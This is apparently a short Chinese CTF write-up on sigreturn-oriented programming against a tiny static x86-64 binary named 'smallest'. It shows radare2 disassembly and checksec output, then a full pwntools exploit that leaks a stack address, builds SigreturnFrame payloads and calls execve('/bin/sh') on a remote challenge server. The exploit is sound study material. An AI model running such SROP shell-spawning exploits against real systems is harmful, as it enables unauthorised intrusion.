SROP的一个实例
以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便
unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest 00:54:15 Warning: Cannot initialize dynamic strings [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze len bytes of instructions for references (aar) [x] Analyze function calls (aac) [ ] [*] Use -AA or aaaa to perform additional experimental analysis. [x] Constructing a function name for fcn.* and sym.func.* functions (aan)) 0x004000b0 -- WASTED [0x004000b0]> afl 0x004000b0 1 17 entry0 [0x004000b0]> pdf entry0 ;-- section..text: / (fcn) entry0 17 | entry0 (); | 0x004000b0 4831c0 xor rax, rax ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text | 0x004000b3 ba00040000 mov edx, 0x400 ; 1024 | 0x004000b8 4889e6 mov rsi, rsp | 0x004000bb 4889c7 mov rdi, rax | 0x004000be 0f05 syscall \ 0x004000c0 c3 ret [0x004000b0]>
源码就这么几行,
junmoxiao@cat ~/s/pd_ubuntu> file smallest 00:54:06 smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped junmoxiao@cat ~/s/pd_ubuntu> checksec smallest 00:54:12 [*] '/Users/junmoxiao/share/pd_ubuntu/smallest' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) junmoxiao@cat ~/s/pd_ubuntu>
最后的exp
#coding:utf-8 from pwn import * import time file_name = './smallest' context.binary = file_name elf = ELF(file_name) #context.log_level = 'debug' syscall_addr = 0x4000be #p = process(file_name) p = remote('106.75.93.227', 20000) #p = remote('106.75.61.55', 20000) #gdb.attach(p, 'aslr on;b * 0x4000b0') # --------------------------------------------------------------------------------- log.info('call read; call write; call read') payload = p64(0x4000b0) payload += p64(0x4000b3) payload += p64(0x4000b0) p.sendline(payload) time.sleep(3) p.send('\xb3') # ------------------------------------------------------------------------------------- # set eax; sigreturn; leak_data = p.recvn(0x400) leak_addr = u64(leak_data[0x8:0x8+8]) print "leak_addr: %s" % hex(leak_addr) stack_addr = leak_addr - 0x1000 print 'stack_start_addr %s' % hex(stack_addr) binsh_addr = stack_addr + 0x300 print 'binsh_addr: %s' % hex(binsh_addr) log.info('stack pivot to %s' % hex(stack_addr)) frame = SigreturnFrame() frame.rax = constants.SYS_read frame.rdi = 0 frame.rsi = stack_addr frame.rdx = 0x500 frame.rsp = stack_addr frame.rip = syscall_addr payload = p64(0x4000b0) + p64(syscall_addr) payload += str(frame) p.sendline(payload) time.sleep(10) p.send(payload[8:8+15]) # set eax=sigreturn time.sleep(5) log.info('execve') frame = SigreturnFrame() frame.rax = constants.SYS_execve frame.rdi = binsh_addr frame.rsi = 0 frame.rdx = 0 frame.rsp = 0x400300 frame.rip = syscall_addr payload = p64(0x4000b0) + p64(syscall_addr) payload += str(frame) payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00' p.sendline(payload) time.sleep(5) p.send(payload[8:8+15]) # set eax=sigreturn p.interactive()